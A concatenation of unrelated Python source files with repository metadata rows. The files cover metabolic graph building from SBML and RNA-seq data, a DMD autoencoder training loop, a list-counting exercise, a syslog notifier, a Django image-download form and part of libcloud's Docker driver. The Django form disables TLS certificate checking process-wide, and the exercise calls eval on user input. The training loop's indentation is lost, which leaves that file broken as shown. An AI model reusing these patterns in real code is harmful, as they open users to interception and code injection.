    """Map each species id to a dict of its remaining XML attributes."""
    metabolites = {}
    for node in xml_nodes:
        attributes = dict(node.attributes.items())
        # The 'id' attribute becomes the key; everything else the value.
        species_id = attributes.pop('id')
        metabolites[species_id] = attributes
    return metabolites
def extract_reactant_products(xml_listof):
    """Collect the 'species' attribute of every reference in *xml_listof*.

    Elements that carry no attributes of their own are treated as
    wrappers: their children are read instead. Returns an empty list
    when *xml_listof* is None.
    """
    species = []
    if xml_listof is None:
        return species
    for element in xml_listof:
        own_attrs = dict(element.attributes.items())
        if own_attrs:
            species.append(own_attrs.get('species'))
        else:
            # Bare wrapper element: descend one level into its children.
            for child in element.childNodes:
                species.append(dict(child.attributes.items()).get('species'))
    return species
def set_reaction_dict(xml_edges):
    """Index every <reaction> element by '<id>_<metaid>'.

    Each value is a dict with:
      - 'id': the remaining XML attributes (id and name removed),
      - 'reaction': all (reactant, product) pairs as edge tuples,
      - 'notes': the text of the last child of the notes block
        (presumably the gene-association annotation -- TODO confirm
        against the actual SBML files used).
    """
    reaction_dict = {}
    for r in xml_edges:
        ids = dict(r.attributes.items())
        notes = r.getElementsByTagName('notes')
        # listOfReactants children are used directly; listOfProducts is
        # handed over whole (extract_reactant_products descends itself).
        listOfReactants = r.getElementsByTagName('listOfReactants')[0].childNodes
        listOfProducts = r.getElementsByTagName('listOfProducts')
        n = ids.pop('id')
        ids.pop('name')
        reactants = extract_reactant_products(listOfReactants)
        products = extract_reactant_products(listOfProducts)
        # Dig the annotation text out of the nested notes markup;
        # assumes a fixed nesting depth -- TODO confirm.
        supp = notes[0].lastChild.childNodes[0].childNodes[0].data
        # Cartesian product: one graph edge per (reactant, product) pair.
        edge_list = []
        for o in reactants:
            for t in products:
                w = (o, t)
                edge_list.append(w)
        reaction_dict[n + '_' + ids.get('metaid')] = {'id': ids, 'reaction': edge_list, 'notes': supp}
    return reaction_dict
def load_graph(path, csvpath, weights=None, weighting=True):
    """Build an (optionally weighted) metabolite graph from an xml model.

    :param path: path to the xml model file
    :param csvpath: path to the RNA-seq DEG table used to derive weights
    :param weights: optional path to a precomputed weight table csv with
        columns 'reactions' and 'weight'; when None, weights are computed
        from the RNA-seq data via extract_RNA_weights
    :param weighting: when True, store each reaction weight on its edges
    :return: tuple (networkx Graph, list of gene ids used for weighting;
        empty when a precomputed weight table was supplied)
    """
    xml_nodes, xml_edges = xml_doc_parsing(path)
    nodes = set_metabo_dict(xml_nodes)
    edges = set_reaction_dict(xml_edges)
    if weights is None:
        w_edges, gene_list = extract_RNA_weights(edges, csvpath)
    else:
        w_edges = pd.read_csv(weights, sep=',')
        # Bug fix: gene_list used to be undefined on this branch, making
        # the final return raise a NameError.
        gene_list = []
    G = nx.Graph()
    G.add_nodes_from(nodes)
    for key in edges:
        raw_metaid = edges[key]['id']['metaid']
        # metaid looks like 'R_<prefix>_<id>'; keep the part after the
        # second underscore to match the weight table -- TODO confirm.
        metaid = raw_metaid.split("_", maxsplit=2)[2]
        weight = w_edges[w_edges['reactions'] == metaid]['weight'].values[0]
        # Reactions with a zero weight are left out of the graph.
        if weight != 0:
            for edge in edges[key]['reaction']:
                G.add_edge(*edge)
                if weighting:
                    G.edges[edge[0], edge[1]]['weight'] = weight
    return G, gene_list
def graph_trimming(g: nx.Graph, nodelist=None):
    """Remove the given metabolites and any resulting isolated nodes.

    :param g: graph whose metabolite nodes are named with an 'M_' prefix
    :param nodelist: iterable of metabolite ids WITHOUT the 'M_' prefix;
        when None the graph is returned unchanged (sizes still printed)
    :return: the trimmed graph (modified in place)
    """
    print("Before trimming : ", len(g), " nodes and ", len(g.edges), " edges")
    if nodelist is not None:
        # Bug fix: the 'M_' prefixing used to run before the None check,
        # so calling with the default argument raised a TypeError.
        prefixed = ['M_' + val for val in nodelist]
        g.remove_nodes_from(prefixed)
        # Removing nodes can strand neighbours: drop isolated nodes too.
        g.remove_nodes_from(list(nx.isolates(g)))
    print("After trimming : ", len(g), " nodes and ", len(g.edges), " edges")
    return g
def load_RNA_data(dfpath):
    """Load a tab-separated RNA-seq table.

    :param dfpath: pathway to dataframe (csv/tsv file)
    :return: RNA-seq dataframe
    """
    return pd.read_csv(dfpath, sep='\t')
def getlogFC(gene_id, file):
    """Return the log2 fold-change values for *gene_id*, or None if absent.

    Column names come from the project-wide utils module.
    """
    matching = file[file[utils.gene_id_col] == gene_id]
    if matching.empty:
        return None
    return matching[utils.logFCcol].values
def extract_RNA_weights(edges, csvpath):
    """Compute one weight per reaction from RNA-seq fold-changes.

    For each reaction, the associated genes are fetched from the
    Metabolic Atlas (HMA) web service; the weight is the mean of
    2**log2FC over the genes found in the DEG table, or 0 when the
    lookup fails or no gene has a fold-change. The resulting table is
    also written to utils.out_weight_table as a side effect.

    :param edges: reaction dict as produced by set_reaction_dict
    :param csvpath: path to the RNA-seq DEG table
    :return: (DataFrame with columns 'reactions'/'weight',
              list of unique gene ids encountered)
    """
    weight_table = pd.DataFrame()
    weight_col, reaction_col, = list(), list()
    gene_list = list()
    rna = get_RNAseq_csv(csvpath)
    # Check the Metabolic Atlas API is reachable before the long loop.
    hma.tempting_connection()
    print("Weight Attribution")
    for r in tqdm(edges.keys(), desc="reaction", total= len(edges.keys())):
        raw_metaid = edges.get(r).get('id').get('metaid')
        # Strip the 'R_<prefix>_' part to obtain the HMA reaction id.
        metaid = raw_metaid.split("_", maxsplit = 2)[2]
        reaction_col.append(metaid)
        try :
            s = hma.automatic_request_to_MA("reactions", metaid, "HumanGem")
            as_genes = hma.get_ensembl_geneid_list(hma.get_genes(s))
            weight_list = list()
            weight = 0
            for tup in as_genes:
                # tup[0] is presumably the Ensembl gene id -- TODO confirm.
                if tup[0] not in gene_list:
                    gene_list.append(tup[0])
                log2FC = getlogFC(tup[0], rna)
                print(tup[0], log2FC)
                if log2FC is not None:
                    # Convert log2 fold-change back to a linear ratio.
                    weight_list.append(float(pow(2,log2FC)))
            if len(weight_list) > 0 :
                weight = np.mean(weight_list)
            weight_col.append(weight)
        except :
            # Any failure (network error, unknown reaction id...) is
            # swallowed and the reaction simply gets weight 0.
            print("!! WARNING : An error occured during the weight attribution !!")
            weight_col.append(0)
    weight_table['reactions'] = reaction_col
    weight_table['weight'] = weight_col
    weight_table.to_csv(utils.out_weight_table)
    return weight_table ,gene_list
def saveNxtogml(g: nx.Graph, out):
    """Serialise the graph to a GML file at *out*.

    Bug fix: the previous call, nx.readwrite.generate_gmlexternal_, does
    not exist in networkx and always raised AttributeError; use the
    standard GML writer instead.
    """
    nx.write_gml(g, out)
def genesFromMulti(path):
    """Deduplicate a tab-separated gene table on 'external_gene_name'.

    The first occurrence of each gene name is kept; the result is
    written back over *path* (comma-separated, pandas' default).
    """
    table = pd.read_csv(path, header=0, sep='\t')
    unique = table.drop_duplicates('external_gene_name', keep='first')
    unique.to_csv(path)
def load_global_graph(path, csvpath, weights=None):
    """Load the metabolic graph without storing weights on the edges.

    Same pipeline (and same return value) as load_graph, but with edge
    weighting disabled.
    """
    return load_graph(path, csvpath, weights, False)
def metabolic_weights(path, ids_table):
    """Match metabolite names from a table against the graph node ids.

    NOTE(review): looks like work in progress -- it only prints the
    matches and returns nothing, and w_list is computed but never used.

    :param path: path to a metabolite table readable by get_RNAseq_csv
    :param ids_table: DataFrame with a 'metabolite' column of node names
    """
    table = get_RNAseq_csv(path)
    # Unused so far; presumably the weights to assign per metabolite.
    w_list = table[utils.metabo_column]
    for m in table.index:
        print(m)
        # Substring match: any node id containing the metabolite name.
        m_pat = re.compile(r'.*'+m+'.*')
        for m_node in ids_table['metabolite']:
            match = re.match(m_pat, m_node)
            if match is not None:
                print(m,': ',match.string)
if __name__ == "__main__":
    # Script entry point: build the U-251 MG metabolic graph weighted by
    # the hypoxia DEG table, trim the metabolite blocklist, and dump the
    # genes used for weighting. Paths are hard-coded to a local drive.
    # ids = get_RNAseq_csv("/run/media/aurelien/ACOFFE/Stage/integration_job/clusters/AB_clusters_weights.csv")
    # metabolic_weights(utils.metabo_path, ids)
    nl = get_node_list("/run/media/aurelien/ACOFFE/Stage/integration_job/12859_2020_3564_MOESM1_ESM_modified.xlsx")
    g, genes = load_graph(path = "/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
                          "U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml",
                   csvpath= "/run/media/aurelien/ACOFFE/Stage/integration_job/new_result_part3/new_result_part3/tables_deg/"
                            "control_hypoxie_ldha_ldhb_hypoxie_DEG_significant.tsv")
    G = graph_trimming(g, nl)
    # Write one gene id per line ('\r' separated) for later reuse.
    with open('/run/media/aurelien/ACOFFE/Stage/integration_job/gene_list.txt', 'w') as genelist :
        for i in genes :
            if i is not None:
                genelist.write(i + '\r')
    # Redundant: the 'with' context manager already closed the file.
    genelist.close()
    # nx.write_gml(G,"/run/media/aurelien/ACOFFE/Stage/integration_job/G.gml")
    # Ge = ig.Graph.from_networkx(G)
    # Ge.write_graphml('/run/media/aurelien/ACOFFE/Stage/integration_job/common.graphml')
    # p_g = load_graph(args.xml)
    # g = graph_trimming(g, args.trim)
    # G = ig.Graph.from_networkx(g)
    #
    # output = args.output + args.name
    # G.write_graphml(output)
    # nodes, edges = xml_doc_parsing("/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
    #                                "U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml")
    # extract_RNA_weights("/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
    #                     "U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml",
    #                     "/run/media/aurelien/ACOFFE/Stage/integration_job/new_result_part3/new_result_part3/tables_deg/"
    #                     "control_hypoxie_ldha_ldhb_hypoxie_DEG_significant.tsv")
    #
    #
    # t = load_graph("/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
    #                "U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml")
    # nl = get_node_list("/run/media/aurelien/ACOFFE/Stage/integration_job/12859_2020_3564_MOESM1_ESM_modified.xlsx")
    # g = graph_trimming(t, nl)
    # G = ig.Graph.from_networkx(g)
    #
    # G.write_graphml('/run/media/aurelien/ACOFFE/Stage/integration_job/Metabo_brain_graph.graphml')
    # plt.subplot()
    # nx.draw(g, node_size=1)
    # plt.show()
    # with open('/run/media/aurelien/ACOFFE/Stage/integration_job/Metabo_brain_graph.json', 'w') as out:
    #     out.write(json.dumps(json_graph.node_link_data(g)))
"aurelien.coffe@gmail.com"
] | aurelien.coffe@gmail.com |
7dd28334fa4623826de128a777c796b19d83a061 | ba057913ba4cc33cd7f12a60dc2b8d161498a15f | /train_fluid_flow_machine.py | 70f22c91daa8ce4dadc09d366fb729af590bc2f9 | [
"MIT"
] | permissive | RahulSundar/dmd_autoencoder | 887de1d28d5001cf3224fc2e5619e01b32764a82 | ec776042f5b6877ee0d6861f8ce1eec30b212efc | refs/heads/main | 2023-01-22T09:34:02.217008 | 2020-12-04T20:23:47 | 2020-12-04T20:23:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,304 | py | """" This module will train dmd autoencoder on fluid flow dataset. """
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
from dmd_machine.dmd_ae_machine import DMDMachine
from dmd_machine.loss_function import LossFunction
from data.Data import DataMaker
from tensorflow import keras
from sklearn.model_selection import train_test_split
from tensorflow.keras.models import model_from_json
from return_stats import *
from create_plots import *
from datetime import date
import pickle
import time
# ======================================================================================================================
# Read in dataset.
# ======================================================================================================================
training_data = pickle.load(open('./data/dataset_fluid.pkl', 'rb'))
data = training_data.data_val
# Network Hyper Parameters.
hyp_params = dict()
hyp_params['num_t_steps'] = training_data.params['num_time_steps']
hyp_params['phys_dim'] = training_data.params["num_physical_dim"]
hyp_params['num_init_conds'] = training_data.params['num_initial_conditions']
hyp_params['batch_size'] = 256
hyp_params['num_epochs'] = 200
# Encoding/Decoding Layer Parameters.
hyp_params['num_en_layers'] = 3
hyp_params['num_en_neurons'] = 80
hyp_params['latent_dim'] = 3
hyp_params['window_size'] = 256
hyp_params['activation'] = 'elu'
hyp_params['weight_initializer'] = 'he_uniform'
hyp_params['bias_initializer'] = 'he_uniform'
hyp_params['ae_output_activation'] = "linear"
hyp_params['hidden_activation'] = "elu"
hyp_params['c1'] = 1 # coefficient auto-encoder loss.
hyp_params['c2'] = 1 # coefficient of dmd loss.
hyp_params['c3'] = 1 # coefficient of pred loss.
save_folder = "AeEx3_" + str(date.today().isoformat()) # save results in the folder " Results/save_folder"-
# including loss curves and plot latent data.
# convert input data from numpy to tensorflow.
input_data = training_data.data_val
all_data = tf.data.Dataset.from_tensor_slices(input_data)
# number of initial conditions in training and testing dataset.
hyp_params['num_init_conds_training'] = int(0.8 * hyp_params['num_init_conds'])
hyp_params['num_init_conds_test'] = hyp_params['num_init_conds'] - hyp_params['num_init_conds_training']
# initialize machine and loss objects.
myMachine = DMDMachine(hyp_params)
# myMachine.autoencoder = keras.models.load_model("./models/my_model_Ex2_oct21", compile=False)
myLoss = LossFunction(hyp_params)
# Learning rate initialization.
hyp_params["initial_learning_rate"] = 3e-3 # MAJOR PARAMETER CHOICE
hyp_params["esteps"] = 30 # MAJOR PARAMETER CHOICE
count = 0
# clear previous run session.
tf.keras.backend.clear_session()
# create folder to save results.
create_new_folders(save_folder)
# save hyperparams in a json file.
save_hyp_params_in_json(hyp_params=hyp_params, json_file_path=os.path.join("results", save_folder, "hyp_params.txt"))
# ======================================================================================================================
# Prepare dataset.
# ======================================================================================================================
# shuffle the dataset and then divide to training vs testing data sets. 80% training .20% testing.
data_train, data_test = train_test_split(input_data, test_size=0.2, random_state=42)
print("dimensions of training dataset (ic x phys_dim x timesteps) = ", np.shape(data_train))
print("dimensions of testing dataset (ic x phys_dim x timesteps) = ", np.shape(data_test))
# ======================================================================================================================
# Unit test to verify that testing and training datasets are disjoint.
# ======================================================================================================================
# Verify that the train/test split is disjoint by comparing the full initial
# condition (first time step) of every train/test trajectory pair.
# np.array_equal compares every physical dimension at once, so this also
# works for datasets with phys_dim != 3 (the original hard-coded indices
# 0..2 and chained the comparisons by hand).
for ic_train in data_train:
    for ic_test in data_test:
        # column 0 of a trajectory is its initial condition
        if np.array_equal(ic_test[:, 0], ic_train[:, 0]):
            print("Testing and Training datasets intersect!")
            print(ic_test[:, 0])
# convert datasets from numpy to tensorflow.
data_train = tf.data.Dataset.from_tensor_slices(data_train)
data_test = tf.data.Dataset.from_tensor_slices(data_test)
# ======================================================================================================================
# Begin training model
# ======================================================================================================================
# initialize loss results (lists) as a function of epoch (iteration).
train_loss_results = []
test_loss_results = []
train_dmd_loss = []
test_dmd_loss = []
train_ae_loss = []
test_ae_loss = []
train_pred_loss = []
test_pred_loss = []
epoch = 0
while epoch < (hyp_params['num_epochs']):
# start timer.
start_time = time.process_time()
# save the total loss of the training data and testing data.
epoch_loss_avg_train = tf.keras.metrics.Mean()
epoch_loss_avg_test = tf.keras.metrics.Mean()
# keep track of individual losses as well, aka dmd loss and ae loss.
epoch_loss_dmd_train = tf.keras.metrics.Mean()
epoch_loss_dmd_test = tf.keras.metrics.Mean()
epoch_loss_ae_train = tf.keras.metrics.Mean()
epoch_loss_ae_test = tf.keras.metrics.Mean()
epoch_loss_pred_train = tf.keras.metrics.Mean()
epoch_loss_pred_test = tf.keras.metrics.Mean()
# Build out the batches within a given epoch.
train_batch = data_train.shuffle(hyp_params['num_init_conds_training'], seed=42).batch(hyp_params["batch_size"],
drop_remainder=True)
# no need to shuffle test dataset.
test_batch = data_test.batch(hyp_params["batch_size"], drop_remainder=True)
    # Step-decay learning-rate schedule (see Ch. 11 of the O'Reilly book):
    # every `esteps` epochs, multiply the initial rate by a further factor
    # of 0.2 and rebuild the Adam optimizer at the new rate.  On the very
    # first pass (epoch 0, count 0) the rate equals the initial rate,
    # since 0.2 ** 0 == 1.
    if epoch % hyp_params["esteps"] == 0:
        hyp_params['lr'] = (.2 ** count) * hyp_params["initial_learning_rate"]
        adam_optimizer = tf.keras.optimizers.Adam(hyp_params['lr'])
        count += 1
# Iterate through all the batches within an epoch.
for batch_training_data in train_batch:
# normalize batch
# Build terms that we differentiate (i.e. loss) and that we differentiate with respect to.
with tf.GradientTape() as tape:
# training=True is only needed if there are layers with different
# behavior during training versus inference (e.g. Dropout).
predictions_train = myMachine(batch_training_data)
ae_loss = predictions_train[3]
dmd_loss = predictions_train[2]
pred_loss = predictions_train[5]
loss_train = myLoss(batch_training_data, predictions_train)
# Compute gradients and then apply them to update weights within the Neural Network
gradients = tape.gradient(loss_train, myMachine.trainable_variables)
adam_optimizer.apply_gradients([
(grad, var)
for (grad, var) in zip(gradients, myMachine.trainable_variables)
if grad is not None
])
# Keep track of the loss after each batch.
epoch_loss_avg_train.update_state(loss_train)
epoch_loss_ae_train.update_state(ae_loss)
epoch_loss_dmd_train.update_state(dmd_loss)
epoch_loss_pred_train.update_state(pred_loss)
for batch_test_data in test_batch:
predictions_test = myMachine(batch_test_data)
dmd_test = predictions_test[2]
ae_test = predictions_test[3]
pred_test = predictions_test[5]
loss_test = myLoss(batch_test_data, predictions_test)
epoch_loss_avg_test.update_state(loss_test)
epoch_loss_ae_test.update_state(ae_test)
epoch_loss_dmd_test.update_state(dmd_test)
epoch_loss_pred_test.update_state(pred_test)
train_loss_results.append(epoch_loss_avg_train.result())
test_loss_results.append(epoch_loss_avg_test.result())
train_dmd_loss.append(epoch_loss_dmd_train.result())
train_ae_loss.append(epoch_loss_ae_train.result())
train_pred_loss.append(epoch_loss_pred_train.result())
test_dmd_loss.append(epoch_loss_dmd_test.result())
test_ae_loss.append(epoch_loss_ae_test.result())
test_pred_loss.append(epoch_loss_pred_test.result())
if epoch % 15 == 0:
# save plots in results folder. Plot the latent space, ae_reconstruction, and input_batch.
create_plots_fluid_pred(batch_training_data, predictions_train, hyp_params, epoch, save_folder, "train")
create_plots_fluid_pred(batch_test_data, predictions_test, hyp_params, epoch, save_folder, "test")
# fluid latent space plots.
create_plots_fluid_latent(predictions_train, hyp_params, epoch, save_folder, data_type="train")
create_plots_fluid_latent(predictions_test, hyp_params, epoch, save_folder, data_type="test")
if epoch % 10 == 0:
# plot latent, input and reconstructed ae latest batch data.
print_status_bar(epoch, hyp_params["num_epochs"], epoch_loss_avg_train.result(),
epoch_loss_avg_test.result(), time.process_time() - start_time,
log_file_path=os.path.join("results", save_folder, "log.txt"))
if epoch % 50 == 0:
# plot loss curves.
create_plots_of_loss(train_dmd_loss, train_ae_loss, test_dmd_loss, test_ae_loss, train_pred_loss,
test_pred_loss, myLoss.c1, myLoss.c2, myLoss.c3, epoch, save_folder)
# save loss curves in pickle files.
save_loss_curves(train_loss_results, test_loss_results, train_dmd_loss, test_dmd_loss, train_ae_loss,
test_ae_loss, train_pred_loss, test_pred_loss,
file_path=os.path.join("results", save_folder, "Loss"))
# save current machine.
myMachine.autoencoder.encoder.save(os.path.join("models", str("enc") + save_folder), save_format='save_weights')
myMachine.autoencoder.decoder.save(os.path.join("models", str("dec") + save_folder), save_format='save_weights')
epoch += 1
# final summary of the network, again for diagnostic purposes.
myMachine.summary()
| [
"oissan@predsci.com"
] | oissan@predsci.com |
b32d16281b9eb3a9c277b36b8d8018e725da75a7 | f2a02a48126c9980d2e3ccf9e10d4ea5578fa618 | /List/10.3.py | 1bfde8ab5ff304ff73552c7c2bd6d82ecd49076f | [] | no_license | MuhammadSaqib-Github/Python | 6a98087ba15e34ce27c91b270f91049337d134d4 | d91c97cbaf94e1ae45364319cf9ba9a5485c0597 | refs/heads/main | 2023-06-16T08:18:11.191132 | 2021-07-17T07:00:21 | 2021-07-17T07:00:21 | 386,861,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | integers = eval(input("Enter numbers sep by commas"))
# Report how many times each distinct value occurs in `integers`
# (read from user input above), in order of first appearance.
# A membership test on the list of already-reported values replaces the
# original inner flag loop that tracked "yes"/"no" strings by hand; the
# unused `time = 0` local is dropped.  Printed output is unchanged.
rep = []
for value in integers:
    if value not in rep:
        c = integers.count(value)
        print(value, "occued", c, "time")
        rep.append(value)
'''
l = []
r = []
c = 0
index = []
for i in range(7):
n = eval(input("Enter a number: "))
l.append(n)
repeated = []
for i in range(len(l)):
c = 0
for j in range(len(l)):
if l[i] == l[j]:
c = c + 1
if c <= 1:
r.append(l[i])
if c > 1:
repeated.append(l[i])
index.append(c)
for i in range(len(r)):
print(r[i], "occured 1 time")
rep = []
for i in repeated:
if i not in rep:
rep.append(i)
ind = []
for i in index:
if i not in ind:
ind.append(i)
for i in range(len(ind)):
print(rep[i], "occured", ind[i], "times")
''' | [
"noreply@github.com"
] | MuhammadSaqib-Github.noreply@github.com |
2a5b07fdd14f3beca3bb61d3fb428d48f63432b3 | ee2521da7c10469d7e977758c3a07ae5c44a7e45 | /notilog-server | eb46ed41d2e0682cb0d3764996e9cc769118cd42 | [
"ISC"
] | permissive | mutantmonkey/notilog | d0d0206f1b33e31fb1f65085fed5941ff1c2763d | 0c5d87d9751bb9282e7319c44d0bce0a6542723f | refs/heads/master | 2021-01-02T08:40:52.350454 | 2014-06-09T03:43:06 | 2014-06-09T03:43:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | #!/usr/bin/python3
import os.path
import yaml
from notilog import server
if __name__ == '__main__':
    # Locate the config file via the XDG base-directory spec when pyxdg is
    # available, otherwise fall back to the conventional dotfile path.
    # The original bare `except:` also swallowed KeyboardInterrupt and
    # SystemExit; catching Exception keeps the fallback behaviour without
    # hiding interpreter-exit signals.
    configpath = None
    try:
        import xdg.BaseDirectory
        configpath = xdg.BaseDirectory.load_first_config('notilog/config.yml')
    except Exception:
        pass
    if configpath is None:
        # load_first_config() returns None when no config file exists yet.
        configpath = os.path.expanduser('~/.config/notilog/config.yml')

    config = yaml.safe_load(open(configpath))

    # Run the syslog server until interrupted; close the socket on Ctrl-C.
    s = server.PagerSyslogServer(config)
    try:
        s.serve_forever()
    except KeyboardInterrupt:
        s.close()
| [
"mutantmonkey@mutantmonkey.in"
] | mutantmonkey@mutantmonkey.in | |
2f45302e9a2e5bd5de2f101b8abe295f52b3d8b5 | cb3b5cb9d742fe38fc2a800189afeb1d262e4686 | /images/forms.py | ce7ad2aef6a4755ef27f700fb7ec72ef7cfee2b8 | [] | no_license | RunHuaOil/BookMarks | 0869cac7e203cad562e01fcc3eabcb9b22cd6176 | 4fd59506731d6049cfbe0a01efdfee50eed3a1b4 | refs/heads/master | 2021-01-01T08:19:15.173337 | 2017-07-18T08:03:49 | 2017-07-18T08:03:49 | 97,569,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | from django import forms
from .models import Image
from uuslug import slugify
from urllib import request
from django.core.files.base import ContentFile
import ssl
# Globally disable TLS certificate verification for all urllib HTTPS
# requests made by this process (used by the image download in save()).
# NOTE(review): this is a security risk — it allows man-in-the-middle
# attacks on fetched images; prefer verified certificates or an explicit,
# scoped SSL context.
ssl._create_default_https_context = ssl._create_unverified_context
class ImageCreateForm(forms.ModelForm):
    """Form for sharing a remote image by URL.

    The image URL arrives in a hidden field; on save the file is
    downloaded and stored under a slugified name derived from the title.
    """

    class Meta:
        model = Image
        fields = ['title', 'url', 'description']
        widgets = {
            # The URL is supplied programmatically, not typed by the user.
            'url': forms.HiddenInput,
        }

    def clean_url(self):
        """Validate that the shared URL points to a jpg/jpeg file.

        Raises ``forms.ValidationError`` for any other extension.  Splitting
        first also guards against URLs that contain no '.' at all — the
        original indexed ``rsplit(...)[1]`` unconditionally and raised an
        unhandled IndexError for such URLs instead of a validation error.
        """
        url = self.cleaned_data['url']
        valid_extensions = ['jpg', 'jpeg']
        parts = url.rsplit('.', 1)
        if len(parts) < 2 or parts[1].lower() not in valid_extensions:
            raise forms.ValidationError('只能上传 jpg jpeg 格式的图片')
        return url

    def save(self, commit=True):
        """Download the image behind the shared link and attach it.

        The file is saved onto the model's ImageField before the model
        itself is (optionally) persisted.
        """
        image = super(ImageCreateForm, self).save(commit=False)
        image_url = self.cleaned_data['url']
        image_name = "{}.{}".format(slugify(image.title), image_url.rsplit('.', 1)[1].lower())
        response = request.urlopen(image_url)
        image.image.save(image_name, ContentFile(response.read()), save=False)
        if commit:
            image.save()
        return image
| [
"crh799250413@gmail.com"
] | crh799250413@gmail.com |
63d4d14065576f3188fdfb3e039c6033941abc39 | 5537eec7f43098d216d2b550678c8d10b2a26f09 | /venv/ansible/lib/python2.7/site-packages/libcloud/container/drivers/docker.py | faf5117cf33be7f44cf30b976707475c81a5fc89 | [] | no_license | wipro-sdx/Automation | f0ae1512b8d9d491d7bacec94c8906d06d696407 | a8c46217d0fbe51a71597b5db87cbe98ed19297a | refs/heads/master | 2021-07-08T11:09:05.314435 | 2018-05-02T07:18:54 | 2018-05-02T07:18:54 | 131,812,982 | 0 | 1 | null | 2020-07-23T23:22:33 | 2018-05-02T07:15:28 | Python | UTF-8 | Python | false | false | 23,277 | py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import shlex
import re
try:
import simplejson as json
except:
import json
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import b
from libcloud.common.base import JsonResponse, ConnectionUserAndKey
from libcloud.common.types import InvalidCredsError
from libcloud.container.base import (Container, ContainerDriver,
ContainerImage)
from libcloud.container.providers import Provider
from libcloud.container.types import ContainerState
VALID_RESPONSE_CODES = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
class DockerResponse(JsonResponse):
valid_response_codes = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
def parse_body(self):
if len(self.body) == 0 and not self.parse_zero_length_body:
return self.body
try:
# error responses are tricky in Docker. Eg response could be
# an error, but response status could still be 200
content_type = self.headers.get('content-type', 'application/json')
if content_type == 'application/json' or content_type == '':
body = json.loads(self.body)
else:
body = self.body
except ValueError:
m = re.search('Error: (.+?)"', self.body)
if m:
error_msg = m.group(1)
raise Exception(error_msg)
else:
raise Exception(
'ConnectionError: Failed to parse JSON response')
return body
def parse_error(self):
if self.status == 401:
raise InvalidCredsError('Invalid credentials')
return self.body
def success(self):
return self.status in self.valid_response_codes
class DockerException(Exception):
def __init__(self, code, message):
self.code = code
self.message = message
self.args = (code, message)
def __str__(self):
return "%s %s" % (self.code, self.message)
def __repr__(self):
return "DockerException %s %s" % (self.code, self.message)
class DockerConnection(ConnectionUserAndKey):
responseCls = DockerResponse
timeout = 60
def add_default_headers(self, headers):
"""
Add parameters that are necessary for every request
If user and password are specified, include a base http auth
header
"""
headers['Content-Type'] = 'application/json'
if self.user_id and self.key:
user_b64 = base64.b64encode(b('%s:%s' % (self.user_id, self.key)))
headers['Authorization'] = 'Basic %s' % (user_b64.decode('utf-8'))
return headers
class DockerContainerDriver(ContainerDriver):
"""
Docker container driver class.
>>> from libcloud.container.providers import get_driver
>>> driver = get_driver('docker')
>>> conn = driver(host='198.61.239.128', port=4243)
>>> conn.list_containers()
or connecting to http basic auth protected https host:
>>> conn = driver('user', 'pass', host='https://198.61.239.128', port=443)
connect with tls authentication, by providing a hostname, port, a private
key file (.pem) and certificate (.pem) file
>>> conn = driver(host='https://198.61.239.128',
>>> port=4243, key_file='key.pem', cert_file='cert.pem')
"""
type = Provider.DOCKER
name = 'Docker'
website = 'http://docker.io'
connectionCls = DockerConnection
supports_clusters = False
version = '1.24'
def __init__(self, key=None, secret=None, secure=False, host='localhost',
port=4243, key_file=None, cert_file=None):
"""
:param key: API key or username to used (required)
:type key: ``str``
:param secret: Secret password to be used (required)
:type secret: ``str``
:param secure: Whether to use HTTPS or HTTP. Note: Some providers
only support HTTPS, and it is on by default.
:type secure: ``bool``
:param host: Override hostname used for connections.
:type host: ``str``
:param port: Override port used for connections.
:type port: ``int``
:param key_file: Path to private key for TLS connection (optional)
:type key_file: ``str``
:param cert_file: Path to public key for TLS connection (optional)
:type cert_file: ``str``
:return: ``None``
"""
super(DockerContainerDriver, self).__init__(key=key, secret=secret,
secure=secure, host=host,
port=port,
key_file=key_file,
cert_file=cert_file)
if host.startswith('https://'):
secure = True
# strip the prefix
prefixes = ['http://', 'https://']
for prefix in prefixes:
if host.startswith(prefix):
host = host.strip(prefix)
if key_file or cert_file:
# docker tls authentication-
# https://docs.docker.com/articles/https/
# We pass two files, a key_file with the
# private key and cert_file with the certificate
# libcloud will handle them through LibcloudHTTPSConnection
if not (key_file and cert_file):
raise Exception(
'Needs both private key file and '
'certificate file for tls authentication')
self.connection.key_file = key_file
self.connection.cert_file = cert_file
self.connection.secure = True
else:
self.connection.secure = secure
self.connection.host = host
self.connection.port = port
def install_image(self, path):
"""
Install a container image from a remote path.
:param path: Path to the container image
:type path: ``str``
:rtype: :class:`libcloud.container.base.ContainerImage`
"""
payload = {
}
data = json.dumps(payload)
result = self.connection.request('/v%s/images/create?fromImage=%s' %
(self.version, path), data=data,
method='POST')
if "errorDetail" in result.body:
raise DockerException(None, result.body)
try:
# get image id
image_id = re.findall(
r'{"status":"Download complete"'
r',"progressDetail":{},"id":"\w+"}',
result.body)[-1]
image_id = json.loads(image_id).get('id')
except:
raise DockerException(None, 'failed to install image')
image = ContainerImage(
id=image_id,
